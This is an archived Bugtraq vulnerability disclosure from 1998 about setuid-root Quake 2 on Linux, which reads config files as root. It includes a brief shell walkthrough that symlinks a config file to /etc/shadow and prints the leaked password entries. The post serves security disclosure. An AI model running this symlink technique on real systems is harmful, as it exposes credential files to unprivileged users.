Bugtraq: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files

From: kevingeo () CRUZIO COM (kevingeo () CRUZIO COM)
Date: Wed, 25 Feb 1998 05:49:58 -0500


Vulnerable:
Everyone who followed the installation instructions and made Quake2 setuid
root.

Exploit:
Quake2 reads its conf files (and .pak files) before giving up root,
and it doesn't check the permissions before hand.

nop () chrome:~> id
uid=501(nop) gid=100(users) groups=100(users)
nop () chrome:~> mkdir baseq2
nop () chrome:~> ln -s /etc/shadow baseq2/config.cfg
nop () chrome:~> ls -l /usr/games/quake/quake2
-rws--x--x   1 root     root       303444 Feb 24 19:07
/usr/games/quake/quake2
nop () chrome:~> /usr/games/quake/quake2
couldn't exec default.cfg
execing config.cfg
Unknown command "root:[snip]:10137:0:99999:7:::"
Unknown command "bin:*:9977:0:99999:7:::"
Unknown command "daemon:*:9977:0:99999:7:::"
Unknown command "adm:*:9977:0:99999:7:::"
Unknown command "lp:*:9977:0:99999:7:::"
[etc]

By Date By Thread

Current thread:

/usr/dt/bin/dtappgather exploit Mastoras (Feb 23)
- Re: /usr/dt/bin/dtappgather exploit J.A. Gutierrez (Feb 24)
- AOL Instant Messanger Bug Aleph One (Feb 24)
- Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files kevingeo () CRUZIO COM (Feb 25)
  - Re: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary William T Wilson (Feb 25)
- Quake 2 Linux 3.13 - ref_root.so still works kevingeo () CRUZIO COM (Feb 25)
- <Possible follow-ups>
- Re: /usr/dt/bin/dtappgather exploit Steven Goldberg - SE - Seattle WA (Feb 25)
  - Re: /usr/dt/bin/dtappgather exploit J.A. Gutierrez (Feb 25)